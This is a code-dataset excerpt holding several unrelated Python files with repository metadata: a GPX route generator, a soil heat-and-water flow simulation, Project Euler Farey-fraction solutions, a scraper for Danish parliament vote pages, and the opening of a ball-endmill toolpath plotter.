"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 380,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 383,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 386,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 389,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 392,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 395,
"usage_type": "attribute"
},
{
"api_name": "entity.Weapon",
"line_number": 407,
"usage_type": "attribute"
}
] |
9512772188
|
import sys
import pandas as pd
import numpy as np
import xml.dom.minidom
#from exercise 3
def output_gpx(points, output_filename):
"""
Output a GPX file with latitude and longitude from the points DataFrame.
"""
def append_trkpt(pt, trkseg, doc):
trkpt = doc.createElement('trkpt')
trkpt.setAttribute('lat', '%.8f' % (pt['lat']))
trkpt.setAttribute('lon', '%.8f' % (pt['lon']))
trkseg.appendChild(trkpt)
doc = xml.dom.minidom.getDOMImplementation().createDocument(None, 'gpx', None)
trk = doc.createElement('trk')
doc.documentElement.appendChild(trk)
trkseg = doc.createElement('trkseg')
trk.appendChild(trkseg)
points.apply(append_trkpt, axis=1, trkseg=trkseg, doc=doc)
with open(output_filename, 'w') as fh:
doc.writexml(fh, indent=' ')
def main(input_file):
culture_tour = pd.read_csv('culture_tour.csv')
dessert_tour = pd.read_csv('dessert_tour.csv')
pub_crawl = pd.read_csv('pub_crawl.csv')
scenic_tour = pd.read_csv('scenic_tour.csv')
lodging_df = pd.read_csv(input_file)
lodging_coordinates_df = lodging_df[['lat', 'lon']]
output_gpx(lodging_coordinates_df, 'lodging.gpx')
culture_interest = lodging_df['culture'].values[0]
dessert_interest = lodging_df['dessert'].values[0]
drinks_interest = lodging_df['drinks'].values[0]
scenic_interest = lodging_df['scenic'].values[0]
if (culture_interest == 'y'):
culture_tour_subset_df = culture_tour[['lat', 'lon']]
culture_tour_subset_df = culture_tour_subset_df.append(culture_tour_subset_df.iloc[0])
output_gpx(culture_tour_subset_df, 'culture.gpx')
if (dessert_interest == 'y'):
dessert_tour_subset_df = dessert_tour[['lat', 'lon']]
dessert_tour_subset_df = dessert_tour_subset_df.append(dessert_tour_subset_df.iloc[0])
output_gpx(dessert_tour_subset_df, 'desserts.gpx')
if (drinks_interest == 'y'):
pub_crawl_subset_df = pub_crawl[['lat', 'lon']]
pub_crawl_subset_df = pub_crawl_subset_df.append(pub_crawl_subset_df.iloc[0])
output_gpx(pub_crawl_subset_df, 'drinks.gpx')
if (scenic_interest == 'y'):
scenic_tour_subset_df = scenic_tour[['lat', 'lon']]
scenic_tour_subset_df = scenic_tour_subset_df.append(scenic_tour_subset_df.iloc[0])
output_gpx(scenic_tour_subset_df, 'scenic.gpx')
if __name__ == '__main__':
input_file = sys.argv[1]
main(input_file)
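# Note: DataFrame.append was removed in pandas 2.0; on newer pandas the loop-closing lines in
# main() can be written with pd.concat instead. A sketch, assuming the same DataFrames as above:
#
#   culture_tour_subset_df = pd.concat(
#       [culture_tour_subset_df, culture_tour_subset_df.iloc[[0]]],
#       ignore_index=True)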
|
tomchiu19/tourPlanner
|
code/05-generate-gpx.py
|
05-generate-gpx.py
|
py
| 2,464 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "xml.dom.minidom.dom.minidom.getDOMImplementation",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "xml.dom.minidom.dom",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "xml.dom.minidom",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 62,
"usage_type": "attribute"
}
] |
41054313506
|
# coding: utf-8
# # Heat Diffusion in Soils
#
# This Jupyter Notebook gives an example how to implement a 1D heat diffusion model in Python.
#
# First we need to import the packages which we will be using:
#
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import CoupledHeatWaterFlowTHe as cfun
import MyTicToc as mt
sns.set()
## Main
# In[0:] Domain & Soil properties
nIN = 51
# soil profile down to 2 meters depth
zIN = np.linspace(-2.0, 0, num=nIN).reshape(nIN, 1)
# nIN = np.shape(zIN)[0]
zN = np.zeros(nIN - 1).reshape(nIN - 1, 1)
zN[0, 0] = zIN[0, 0]
zN[1:nIN - 2, 0] = (zIN[1:nIN - 2, 0] + zIN[2:nIN - 1, 0]) / 2
zN[nIN - 2, 0] = zIN[nIN - 1]
nN = np.shape(zN)[0]
ii = np.arange(0, nN - 1)
dzN = (zN[ii + 1, 0] - zN[ii, 0]).reshape(nN - 1, 1)
dzIN = (zIN[1:, 0] - zIN[0:-1, 0]).reshape(nIN - 1, 1)
# collect model dimensions in a pandas series: mDim
mDim = {'zN' : zN,
'zIN' : zIN,
'dzN' : dzN,
'dzIN' : dzIN,
'nN' : nN,
'nIN' : nIN
}
mDim = pd.Series(mDim)
# ## Definition of material properties
# In this section of the code we define the material properties
# Soil Properties
# [J/(m3 K)] volumetric heat capacity of soil solids
zetaSol = 2.235e6
# [J/(m3 K)] volumetric heat capacity of water (Fredlund 2006)
zetaWat = 4.154e6
# rhoW = 1000 # [kg/m3] density of water
rhoS = 2650 # [kg/m3] density of solid phase
rhoB = 1700 # %[kg/m3] dry bulk density of soil
n = 1 - rhoB / rhoS # [-] porosity of soil = saturated water content.
qCont = 0.75 # quartz content
# collect soil parameters in a pandas Series: sPar
sPar = {'vGA': np.ones(np.shape(zN)) * 1 / 2.0, # alpha[1/m]
'vGN': np.ones(np.shape(zN)) * 2.0, # n[-]
'vGM': np.ones(np.shape(zN)) * (1 - 1 / 2.0), # m = 1-1/n[-]
'thS': np.ones(np.shape(zN)) * 0.4, # saturated water content
'thR': np.ones(np.shape(zN)) * 0.03, # residual water content
'KSat': np.ones(np.shape(zN)) * 0.25, # [m/day]
'vGE': 0.5, # power factor for Mualem-van Genuchten
'Cv': 1.0e-8, # compressibility of compact sand [1/Pa]
'viscRef': cfun.ViscosityWaterT(283.15),
'qCont': qCont, # quartz content
}
sPar = pd.Series(sPar)
# In[1:] Definition of the Boundary Parameters
# Read meteodata
meteo_data = pd.read_excel('WieringermeerData_Meteo.xlsx')
meteo_data['num_date'] = meteo_data['datetime'].astype(np.int64)/(1e9*3600*24)
meteo_data.set_index('datetime',inplace=True)
# set simulation time to numeric dates from boundary data...
t_range = meteo_data['num_date'][:-1]
taxis = meteo_data.index[:-1]
# collect boundary parameters in a pandas Series: bPar
def BndTTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
bndT = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
topT = bPar.meteo_data['temp'].iloc[md_ind].values
bndT[ii] = 273.15 + topT
return bndT
def BndqWatTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
qBnd = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
rf = bPar.meteo_data['rain_station'].iloc[md_ind].values
qBnd[ii] = -rf
return qBnd
bPar = {'topBndFuncHeat': BndTTop,
'meteo_data': meteo_data,
'topCond': 'Robin',
'lambdaRobTop': 1e9,
'lambdaRobBot': 0,
'TBndBot': 273.15 + 10,
'topBndFuncWat': BndqWatTop, #topBndFuncWat(t,bPar)
'bottomTypeWat': 'Robin', # Robin condition or Gravity condition
'kRobBotWat': 0.05, # Robin resistance term for bottom
'hwBotBnd': 1.0, # pressure head at lower boundary
}
bPar = pd.Series(bPar)
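# Quick sanity check (hypothetical, not executed here) of the boundary functions defined above;
# they are evaluated the same way the solver will call them internally:
#   BndTTop(t_range[0], bPar)    # air temperature in K for the first simulation day
#   BndqWatTop(t_range[0], bPar) # (negative) rainfall flux for the first simulation day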
# In[3:] Define Initial Conditions
zRef = -1.0 # depth of water table
hwIni = zRef - zN
TIni = np.ones(np.shape(zN)) * (10.0 + 273.15) # K
sVecIni = np.concatenate([hwIni, TIni], axis=0)
# Time Discretization
tOut = np.linspace(t_range[0],t_range[365],365*5)
#tplot = taxis[0:50]
nOut = np.shape(tOut)[0]
nOut = len(tOut)
# tOut = np.sort(np.hstack((tOut1, bTime))) # time
# copy initial vector to hw0. Apply squeeze to compress it to one dimension
mt.tic()
int_result = cfun.IntegrateCHWF(tOut, sVecIni, sPar, mDim, bPar)
mt.toc()
hWSim = int_result.y[0:nN]
TSim = int_result.y[nN:2*nN]
thSim = cfun.thFun(hWSim,sPar)
qWSim = cfun.WatFlux(tOut,hWSim,TSim,sPar,mDim,bPar)
qHSim = cfun.HeatFlux(tOut, TSim, hWSim, sPar, mDim, bPar)
#mt.tic()
#TOutPic, hwOutPic = himp.HalfImplicitPicar(tOut2, hw0, T0, sPar, mDim, bPar, tPar)
#mt.toc()
sns.set()
plt.close('all')
fig1, ax1 = plt.subplots(figsize=(7, 4))
ii = np.arange(nN-1, 0, -10)
ax1.plot(tOut, TSim[ii,].T, '-')
ax1.set_title('Temperature (ODE)')
ax1.set_xlabel('time (days)')
ax1.set_ylabel('temperature [K]')
ax1.legend(zN[ii])
fig2, ax2 = plt.subplots(figsize=(7, 7))
jj = np.arange(0, nOut)
ax2.plot(TSim[:, jj], zN, '-')
ax2.set_title('Temperature vs. depth (ODE)')
ax2.set_ylabel('depth [m]')
ax2.set_xlabel('temperature [K]')
fig3, ax3 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax3.plot(tOut, qHSim[ii,:].T, '-')
ax3.set_title('Heat Flux vs. depth (ODE)')
ax3.set_ylabel('depth [m]')
ax3.set_xlabel('temperature [J/m2]')
ax3.legend(zN[ii])
fig4, ax4 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 10th layer.
ax4.plot(tOut, hWSim[ii,:].T, '-')
ax4.set_ylabel('pressure head [m]')
ax4.set_xlabel('time [d]')
#plot pressure head as a function of depth. Here we plot every time step
fig5, ax5 = plt.subplots(figsize=(7, 7))
ax5.plot(hWSim, zN, '-')
ax5.grid(b=True)
ax5.set_xlabel('pressure head [m]')
ax5.set_ylabel('depth [m]')
# plt.savefig('myfig.png')
fig6, ax6 = plt.subplots(figsize=(7, 7))
ax6.plot(thSim, zN, '-')
ax6.grid(b=True)
ax6.set_xlabel('water content [-]')
ax6.set_ylabel('depth [m]')
fig7, ax7 = plt.subplots(figsize=(7, 4))
# plot the water content for different depths as a function of time
# in this case we plot every 10th layer.
ax7.plot(tOut, thSim[ii,:].T, '-')
ax7.set_ylabel('water content [-]')
ax7.set_xlabel('time [d]')
ax7.legend(zN[ii])
fig8, ax8 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax8.plot(tOut, qWSim[ii,:].T, '-')
ax8.set_title('Water Flux ')
ax8.set_ylabel('depth [m]')
ax8.set_xlabel('water flow [m/d]')
ax8.legend(zN[ii])
fig1.savefig('./figures_scenarios/3_figure1.png')
fig2.savefig('./figures_scenarios/3_figure2.png')
fig3.savefig('./figures_scenarios/3_figure3.png')
fig4.savefig('./figures_scenarios/3_figure4.png')
fig5.savefig('./figures_scenarios/3_figure5.png')
fig6.savefig('./figures_scenarios/3_figure6.png')
fig7.savefig('./figures_scenarios/3_figure7.png')
fig8.savefig('./figures_scenarios/3_figure8.png')
# import shelve
# filename='/tmp/shelve.out'
# my_shelf = shelve.open(filename,'n') # 'n' for new
# for key in dir():
# try:
# my_shelf[key] = globals()[key]
# except TypeError:
# #
# # __builtins__, my_shelf, and imported modules can not be shelved.
# #
# print('ERROR shelving: {0}'.format(key))
# my_shelf.close()
|
solomelittle/EL-Individual-Assignment
|
03_ScriptCH_WieringermeerBoundary.py
|
03_ScriptCH_WieringermeerBoundary.py
|
py
| 7,445 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "seaborn.set",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.ViscosityWaterT",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "pandas.read_excel",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "numpy.int64",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "numpy.size",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.intersect1d",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "numpy.ceil",
"line_number": 103,
"usage_type": "call"
},
{
"api_name": "numpy.size",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 113,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "numpy.intersect1d",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "numpy.ceil",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "MyTicToc.tic",
"line_number": 159,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.IntegrateCHWF",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "MyTicToc.toc",
"line_number": 161,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.thFun",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.WatFlux",
"line_number": 166,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.HeatFlux",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "seaborn.set",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.close",
"line_number": 174,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 174,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 175,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 175,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 183,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 184,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 190,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 198,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 198,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 206,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 206,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 214,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 214,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 220,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 220,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 228,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 228,
"usage_type": "name"
}
] |
26470959901
|
""" Problem 71: Ordered Fractions
https://projecteuler.net/problem=71
Goal: By listing the set of reduced proper fractions for d <= N in ascending
order of size, find the numerator and denominator of the fraction immediately to
the left of n/d.
Constraints: 1 <= n < d <= 1e9, gcd(n, d) == 1, d < N <= 1e15
Reduced Proper Fraction: A fraction n/d, where n & d are positive integers,
n < d, and gcd(n, d) == 1.
Farey Sequence: A sequence of completely reduced fractions, either between 0 and
1, or which when in reduced terms have denominators <= N, arranged in order of
increasing size. The sequence optionally begins with 0/1 and ends with 1/1 if
restricted. The middle term of a Farey sequence is always 1/2 for N > 1.
e.g. if d <= 8, the Farey sequence would be ->
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5,
5/8, 2/3, 5/7, 3/4, 4/5, 5/6, 6/7, 7/8
e.g.: N = 8, n = 3, d = 7
ans = 2/5
"""
from fractions import Fraction
from math import gcd
def left_farey_neighbour(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution finds Farey sequence neighbours based on the following:
If a/b and n/d are neighbours, with a/b < n/d, then their difference:
n/d - a/b = (nb - ad)/(db)
with nb - ad = 1, it becomes ->
n/d - a/b = 1/(db)
A mediant fraction can be found between 2 neighbours using:
p/q = (a + n)/(b + d)
This solution could also be implemented similarly using a Stern-Brocot Tree
fraction search algorithm that uses binary search to recursively find the
target fraction n/d starting from the left & right ancestors, 0/1 & 1/0. Once
found, the last left boundary is used with the target to find all mediants
until a new mediant's denominator exceeds limit.
SPEED (WORSE)
12.03s for N = 1e7
SPEED (Impossible for N > 1e10)
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
upper_bound = Fraction(n, d)
lower_bound = Fraction(n, d + 1) if d != limit else Fraction(n - 1, d)
half = Fraction(1, 2)
if lower_bound < half < upper_bound:
lower_bound = half
neighbour = Fraction()
while True:
delta = upper_bound - lower_bound
neighbour_delta = Fraction(1, lower_bound.denominator * d)
if delta == neighbour_delta:
neighbour = lower_bound
lower_bound = Fraction(
lower_bound.numerator + n,
lower_bound.denominator + d
)
if lower_bound.denominator > limit and neighbour != Fraction():
break
return neighbour.numerator, neighbour.denominator
def compare_fractions(
fraction_a: tuple[int, int],
fraction_b: tuple[int, int]
) -> int:
"""
Rather than compare Doubles, whole numbers are compared based on the
property that:
if a/b < n/d, then ad < bn
:returns: -1 if fraction_a < fraction_b; 1 if fraction_a > fraction_b; 0 if
both equal.
"""
left = fraction_a[0] * fraction_b[1]
right = fraction_a[1] * fraction_b[0]
if left == right:
return 0
return -1 if left < right else 1
def reduce_fraction(numerator: int, denominator: int) -> tuple[int, int]:
divisor = gcd(numerator, denominator)
return numerator // divisor, denominator // divisor
def left_farey_neighbour_improved(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution improved based on the following:
For each denominator b up to N, the only fraction that needs to be considered
is the one with the largest numerator a for which a/b < n/d.
a/b < n/d becomes ad < bn, which means ad <= bn - 1
a <= floor((bn - 1)/d)
for b <= N, floor((bn - 1)/d)/b is the largest fraction.
Fractions with larger denominators are spaced more closely than those with
smaller denominators, so iterating backwards starting at N means the largest
neighbour below n/d will be found sooner. The loop is broken based on the
aforementioned property that:
the difference between 2 neighbours is given as 1/(db)
for a new fraction r/s to be closer to n/d than a/b ->
1/(ds) < (nb - da)/(db) -> s > b/(nb - da)
if delta = nb - da = 1, this means s > b, & the loop can be broken as all
denominators between b and N have already been examined.
N.B. Using the Fraction class from the fractions library is helpful as an
instance intrinsically reduces itself & comparisons & arithmetic operations
are more easily implemented; however, its use reduced the execution speed to
405.98s for N = 1e15, a ~4x reduction in performance.
SPEED (BETTER)
3.9e4ns for N = 1e7
SPEED (BETTER)
93.99s for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
closest_neighbour = 0, 1
b = limit # current denominator starts at provided limit
min_b = 1
while b >= min_b:
a = (b * n - 1) // d # current numerator
current = a, b
# if closest_a / closest_b < current_a / current_b
if compare_fractions(closest_neighbour, current) == -1:
closest_neighbour = reduce_fraction(a, b)
delta = n * b - d * a
min_b = b // delta + 1
b -= 1
return closest_neighbour
def extended_gcd(n1: int, n2: int) -> tuple[int, int, int]:
"""
Implements the Extended Euclidean Algorithm that calculates, in addition to
gcd(n1, n2), the coefficients of Bezout's identity, integers x and y
such that:
ax + by = gcd(a, b)
:returns: Tuple of (gcd, x, y).
:raises ValueError: If either n1 or n2 is less than 0.
"""
if n1 < 0 or n2 < 0:
raise ValueError("Integers should not be negative")
if n1 == 0:
return n2, 0, 1
e_gcd, x, y = extended_gcd(n2 % n1, n1)
return e_gcd, y - n2 // n1 * x, x
def left_farey_neighbour_optimised(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution optimised by taking advantage of the Extended Euclidean Algorithm
that generates coefficients x and y, in addition to the gcd.
When a and b are co-prime, x will be the modular multiplicative inverse of
a % b and y will be the modular multiplicative inverse of b % a. Remember
that the modular multiplicative inverse of an integer a is an integer x such
that the product ax is congruent to 1 with respect to the modulus b.
SPEED (BEST)
5700ns for N = 1e7
SPEED (BEST)
1.9e4ns for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
# Python modulus intrinsically handles cases when x is negative
mod_inverse_of_n = extended_gcd(n, d)[1] % d
new_d = limit % d - mod_inverse_of_n
if new_d < 0:
new_d += d
neighbour_denom = limit - new_d
neighbour_num = (neighbour_denom * n - 1) // d
return neighbour_num, neighbour_denom
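# Illustrative usage sketch using the example from the module docstring (N = 8, n = 3, d = 7,
# expected answer 2/5); this check block is an added sketch, not the Project Euler solution itself.
if __name__ == "__main__":
    print(left_farey_neighbour(8, 3, 7))            # expected: (2, 5)
    print(left_farey_neighbour_improved(8, 3, 7))   # expected: (2, 5)
    print(left_farey_neighbour_optimised(8, 3, 7))  # expected: (2, 5)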
|
bog-walk/project-euler-python
|
solution/batch7/problem71.py
|
problem71.py
|
py
| 7,025 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "fractions.Fraction",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "fractions.Fraction",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "math.gcd",
"line_number": 102,
"usage_type": "call"
}
] |
3739410797
|
import requests
from bs4 import BeautifulSoup
import re
def get_vote_links(current_page):
"""Finds the vote page links on the main folktingspage.
Args:
main_page_soup (_type_): Takes in the main page with all the vote subpages as a soap object
Returns:
_type_: Returns a list of soap Objects with the links to the respective subpages
"""
prefix = 'https://www.ft.dk/'
a = current_page.find_all(attrs={'class':'column-documents__link'})
a = [prefix+x['href'] for x in a]
return a
def get_soup_page(url_page):
"""Converts URL into a BeautifulSoup object.
Args:
url_page (_type_): takes a URL page as input parsed as a string.
Returns:
_type_: returns a BeautifulSoup object.
"""
response = requests.get(url_page)
page = BeautifulSoup(response.content, 'html.parser')
return page
def get_votes_by_party(vote_page) -> dict:
""" Takes a BeautifulSoup object and retrieves the votes by party
section, then strips it and modifies it so that it is returned in a fixed sized
dictionary containing parties, For, Against, Neutral counts.
Args:
        vote_page (BeautifulSoup): the parsed Folketing vote page
(e.g., https://www.ft.dk/samling/20042/afstemning/64.htm)
Returns:
dict: fixed sized dictionary containing parties, For, Against, Neutral, absent counts for each party
"""
table = vote_page.find("div", {"id":"tingdok_accordion_vote-2"})
dict = {'parties': [], 'For': [], 'Against':[], 'Neutral':[], 'Absent':[]}
regex_party = re.compile(r"\w* \(\w+\)")
regex_vote_num = re.compile(r"\d+")
for child in table.table.tbody.children:
if re.search(regex_party, child.text.strip()):
lst = child.text.strip().split("\r\n")
votes = []
for i in lst:
i = i.strip()
if re.search(regex_party,i):
party = i
dict['parties'].append(party)
elif re.search(regex_vote_num, i):
votes.append(i)
dict['For'].append(votes[0])
dict['Against'].append(votes[1])
dict['Neutral'].append(votes[2])
dict['Absent'].append(votes[3])
return dict
def get_votes(vote_page):
vote_section = vote_page.find("div", {"id": "tingdok_accordion_vote-3"})
votes = {
'politician': [],
'party': [],
'vote': []
}
for child in vote_section.tbody.children:
lst = child.text.strip().split("\n\r")
if len(lst) == 3:
person, party, vote = [x.strip() for x in lst]
votes['politician'].append(person)
votes['party'].append(party)
votes['vote'].append(vote)
return votes
def get_description_page(vote_page):
description_link = vote_page.find("a", {"class":"tingdok-backarrow"})
prefix = 'https://www.ft.dk/'
response = requests.get(prefix + description_link['href'])
description_page = BeautifulSoup(response.content, 'html.parser')
return description_page
def get_vote_info(description_page):
description_texts = description_page.find('div', {"class":"tingdok__caseinfospot-a__container"}).text.strip().splitlines()
info = []
for line in description_texts:
if line.strip() != "":
info.append(line.strip())
return info
def get_vote_id(vote_page):
return vote_page.h2.text
def get_title(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
return top_header.h1.text.strip()
def get_vote_caller(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
hosts_section = top_header.find("div", {"class":"tingdok-normal"})
meeting_hosts = []
for line in hosts_section:
clean_line = line.text.strip()
if len(clean_line)>5:
meeting_hosts.append(clean_line)
return meeting_hosts
def get_next_page(current_page):
next_page_url = current_page.find("a", {"title":"Næste"})['href']
prefix = "https://www.ft.dk/dokumenter/dokumentlister/afstemninger"
np_response = requests.get(prefix + next_page_url)
return BeautifulSoup(np_response.content, 'html.parser')
def exists_next_page(current_page):
    next_link = current_page.find("a", {"title": "Næste"})
    return next_link is not None and next_link.get('href') is not None
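# --- Hedged usage sketch (not part of the original scraper) ---
# Shows how the helpers chain together; the URL is the example already given in
# the get_votes_by_party docstring, and the page layout may have changed since.
if __name__ == "__main__":
    vote_page = get_soup_page("https://www.ft.dk/samling/20042/afstemning/64.htm")
    print(get_votes_by_party(vote_page)["parties"])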
|
jonahank/Vote-Prediction-Model
|
utils/scraper_functions.py
|
scraper_functions.py
|
py
| 4,617 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 139,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 140,
"usage_type": "call"
}
] |
1708447421
|
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import ball_endmill
from utility import mm_to_inch
from utility import plot_circle
def plot_spheremill_toolpos(params):
# Extract parameters
diam_tool = params['diam_tool']
diam_sphere = params['diam_sphere']
tab_thickness = params['tab_thickness']
offset_z = params['center_z'] + 0.5*diam_sphere
margin = params['margin']
# Plot sphere
cx_sphere = 0.0
cy_sphere = -0.5*diam_sphere + offset_z
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere)
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere+margin,'c')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere, cy_sphere], 'k')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere+0.5*tab_thickness, cy_sphere+0.5*tab_thickness], 'b')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere-0.5*tab_thickness, cy_sphere-0.5*tab_thickness], 'b')
# Plot ball nose end mills
toolpath_annulus_data = ball_endmill.get_toolpath_annulus_data(params)
for data in toolpath_annulus_data:
for sgn in (1,-1):
